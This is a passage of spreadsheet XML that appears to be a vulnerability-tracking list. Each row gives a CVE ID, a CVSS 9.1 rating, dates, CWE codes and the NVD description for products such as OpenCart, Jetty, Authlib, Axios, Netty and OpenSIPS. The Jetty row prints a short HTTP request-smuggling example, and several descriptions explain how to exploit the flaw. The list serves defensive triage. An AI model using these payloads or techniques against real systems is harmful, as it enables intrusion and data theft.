        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18412</t>
        </is>
      </c>
      <c r="C614" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D614" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr">
        <is>
          <t>OpenCart extensions are uploaded as zip files with .ocmod.zip extensions. Upon installation, the OpenCart v4.2.0.0 extension installer extracts these zip files, but does not validate that the extracted paths stay inside the intended extraction directory. An attacker can craft a malicious extension containing file path traversal sequences, such as ../. With this vulnerability, an attacker can write files, such as a PHP web shell, into the webroot directory.</t>
        </is>
      </c>
      <c r="M614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18412</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18753</t>
        </is>
      </c>
      <c r="C615" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D615" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L615" s="5" t="inlineStr">
        <is>
          <t>The
product firmware contains an embedded, static RSA private key utilized by the
Lighttpd web server for TLS termination. Exposure of this private key allows
malicious actors to breach the confidentiality and integrity of HTTPS
communications, enabling traffic decryption and server spoofing.</t>
        </is>
      </c>
      <c r="M615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18753</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18754</t>
        </is>
      </c>
      <c r="C616" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D616" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L616" s="5" t="inlineStr">
        <is>
          <t>The
product firmware contains an embedded, static RSA private key utilized by the
Lighttpd web server for TLS termination. Exposure of this private key allows
malicious actors to breach the confidentiality and integrity of HTTPS
communications, enabling traffic decryption and server spoofing.</t>
        </is>
      </c>
      <c r="M616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18754</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18924</t>
        </is>
      </c>
      <c r="C617" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D617" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L617" s="5" t="inlineStr">
        <is>
          <t>A flaw in libcurl's handling of HTTP/2 Server Push streams, when the parent
handle is set to share connections with other handles, can lead to
use-after-free in the cleanup process.</t>
        </is>
      </c>
      <c r="M617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18924</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19646</t>
        </is>
      </c>
      <c r="C618" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D618" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>CWE-1149</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr">
        <is>
          <t>IBM Common Licensing Agent 9.0, Agent 9.0.0.1, Agent 9.0.0.2, ART 9.0, ART 9.0.0.1, and ART 9.0.0.2 could allow a remote attacker to redirect users to an arbitrary domain due to improper validation of the HTTP Host header.</t>
        </is>
      </c>
      <c r="M618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19646</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19874</t>
        </is>
      </c>
      <c r="C619" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D619" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in Konami's Metal Gear Online 3, originating from improper validation of lobby data fields related to kicked players. The affected function processes a list of kicked player identifiers using the lobby data key "kick_num" to determine the number of entries, and individual kicked player IDs supplied via keys in the format "kicked_id_%i". The function does not validate that "kick_num" falls within the expected bounds. The game design limits matches to a maximum of 16 players, and the corresponding buffer for storing kicked player IDs is sized accordingly. If "kick_num" exceeds this limit, the function continues writing the provided player IDs past the end of the intended buffer and into adjacent memory regions. These adjacent regions contain Steam callback handler structures responsible for processing lobby data updates, lobby messages, and other related events. By supplying an oversized "kick_num" value and appropriate "kicked_id_%i" fields, an attacker can overwrite fields within the callback handler structures, including function pointers and callback argument values. Successful exploitation may enable control-flow hijacking, potentially allowing arbitrary code execution within the game process.</t>
        </is>
      </c>
      <c r="M619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19874</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22590</t>
        </is>
      </c>
      <c r="C620" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D620" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E620" s="5" t="inlineStr"/>
      <c r="F620" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="inlineStr"/>
      <c r="I620" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-131</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Versions prior to 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 have a remotely triggerable Out-of-Bounds Read while processing RTPS `DATA_FRAG` submessages. An attacker can craft a `DATA_FRAG` with a large `sampleSize` but a small actual payload, and set `fragmentsInSubmessage` such that the receiver treats the packet as the LAST fragment**. In this LAST-fragment path, Fast-DDS computes `incoming_length` based on `sampleSize` and calls `memcpy()` without validating `incoming_data.length &gt;= incoming_length`. As a result, `CacheChange_t::add_fragments()` reads past the received UDP datagram buffer and into adjacent heap memory, copying those bytes into the reassembly buffer. In a Discovery Server deployment, the resulting `CacheChange_t` can be relayed to other participants, meaning that a newly joining participant may receive leaked heap memory (e.g., pointer values that could aid ASLR bypass). Versions 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 fix the issue.</t>
        </is>
      </c>
      <c r="M620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22590</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2332</t>
        </is>
      </c>
      <c r="C621" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D621" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E621" s="5" t="inlineStr"/>
      <c r="F621" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="inlineStr">
        <is>
          <t>eclipse:jetty</t>
        </is>
      </c>
      <c r="I621" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
  *  https://w4ke.info/2025/06/18/funky-chunks.html
  *  https://w4ke.info/2025/10/29/funky-chunks-2.html
Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.
POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
1;ext="val
X
0
GET /smuggled HTTP/1.1
...
Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.</t>
        </is>
      </c>
      <c r="M621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2332</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27690</t>
        </is>
      </c>
      <c r="C622" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D622" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G622" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H622" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I622" s="5" t="inlineStr">
        <is>
          <t>2026-07-14</t>
        </is>
      </c>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr">
        <is>
          <t>Due to an HTTP Request Smuggling vulnerability in SAP Approuter, an unauthenticated attacker could send a specially crafted HTTP request that leads to request-response desynchronization. This could result in the exposure of user responses and cause the system to become unavailable. This leads to a high impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27690</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27962</t>
        </is>
      </c>
      <c r="C623" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D623" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G623" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H623" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I623" s="5" t="inlineStr">
        <is>
          <t>2026-03-16</t>
        </is>
      </c>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.</t>
        </is>
      </c>
      <c r="M623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27962</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33186</t>
        </is>
      </c>
      <c r="C624" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D624" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr">
        <is>
          <t>grpc:grpc</t>
        </is>
      </c>
      <c r="I624" s="5" t="inlineStr">
        <is>
          <t>2026-03-20</t>
        </is>
      </c>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-551</t>
        </is>
      </c>
      <c r="L624" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="M624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33186</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39830</t>
        </is>
      </c>
      <c r="C625" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D625" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E625" s="5" t="inlineStr"/>
      <c r="F625" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I625" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-772</t>
        </is>
      </c>
      <c r="L625" s="5" t="inlineStr">
        <is>
          <t>A malicious SSH peer could send unsolicited global request responses to fill an internal buffer, blocking the connection's read loop. The blocked goroutine could not be released by calling Close(), resulting in a resource leak per connection. Unsolicited global responses are now discarded.</t>
        </is>
      </c>
      <c r="M625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39830</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39832</t>
        </is>
      </c>
      <c r="C626" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D626" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E626" s="5" t="inlineStr"/>
      <c r="F626" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G626" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="H626" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I626" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-502</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr">
        <is>
          <t>When adding a key to a remote agent constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them.</t>
        </is>
      </c>
      <c r="M626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39832</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41869</t>
        </is>
      </c>
      <c r="C627" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D627" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E627" s="5" t="inlineStr"/>
      <c r="F627" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G627" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H627" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="I627" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-862</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Resource Shutdown and Job Interruption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627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41869</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42044</t>
        </is>
      </c>
      <c r="C628" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D628" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E628" s="5" t="inlineStr"/>
      <c r="F628" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G628" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H628" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I628" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.2, he Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into surgical, invisible modification of all JSON API responses — including privilege escalation, balance manipulation, and authorization bypass. The default transformResponse function at lib/defaults/index.js:124 calls JSON.parse(data, this.parseReviver), where this is the merged config object. Because parseReviver is not present in Axios defaults, not validated by assertOptions, and not subject to any constraints, a polluted Object.prototype.parseReviver function is called for every key-value pair in every JSON response, allowing the attacker to selectively modify individual values while leaving the rest of the response intact. This vulnerability is fixed in 1.15.2.</t>
        </is>
      </c>
      <c r="M628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42044</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42508</t>
        </is>
      </c>
      <c r="C629" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D629" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="n">
        <v>0.073</v>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I629" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr">
        <is>
          <t>Previously, a revoked 'SignatureKey' belonging to a CA was not correctly checked for revocation. Now, both the 'key' and 'key.SignatureKey' are checked for @revoked.</t>
        </is>
      </c>
      <c r="M629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42508</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42579</t>
        </is>
      </c>
      <c r="C630" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D630" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I630" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-20, CWE-400, CWE-626</t>
        </is>
      </c>
      <c r="L630" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42579</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42584</t>
        </is>
      </c>
      <c r="C631" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D631" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I631" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L631" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message’s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42584</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45100</t>
        </is>
      </c>
      <c r="C632" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D632" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L632" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions 3.4.0-beta through 3.6.5 and 4.0.0-beta contain a buffer overflow in the {s.b64encode} string transformation. The size check for {s.b64encode} only verifies that the input fits within the 64 KB transformation buffer, but base64 encoding expands the data by roughly a third, so an input between about 49,153 and 65,535 bytes produces more output than the buffer can hold and overflows it by up to 21,844 bytes. Because these transformation buffers sit next to each other in memory and are reused for chained transformations, the overflow writes attacker-controlled data into the adjacent buffer and corrupts values used by later transformations processing the same SIP message. A remote attacker can trigger this by sending a SIP message with a large header value (roughly 50,000 bytes or more) when the routing script applies  {s.b64encode}  to attacker-controlled input, making exploitability dependent on the deployment's routing configuration. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45100</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45537</t>
        </is>
      </c>
      <c r="C633" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D633" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions prior to 3.6.6 and 4.0.0-rc1, the construct_uri() function concatenates multiple URI components (protocol, username, domain, port, params) into a fixed 1024-byte global BSS buffer without any bounds checking. When a routing script calls construct_uri() with an attacker-controlled username, a combined component length exceeding 1024 bytes overflows the buffer, corrupting adjacent global data with attacker-controlled content. The overflow reaches disable_503_translation, a global flag controlling SIP 503 response handling, allowing an attacker to deterministically set the flag via the URI username and alter the server's routing behavior for subsequent messages. Because the same buffer is shared with contact_builder(), the overflow also corrupts that function's data, and without a memory sanitizer the adjacent globals are silently overwritten on every request containing a long username. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45537</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45764</t>
        </is>
      </c>
      <c r="C634" s="5" t="n">
        <v>9.1</v>
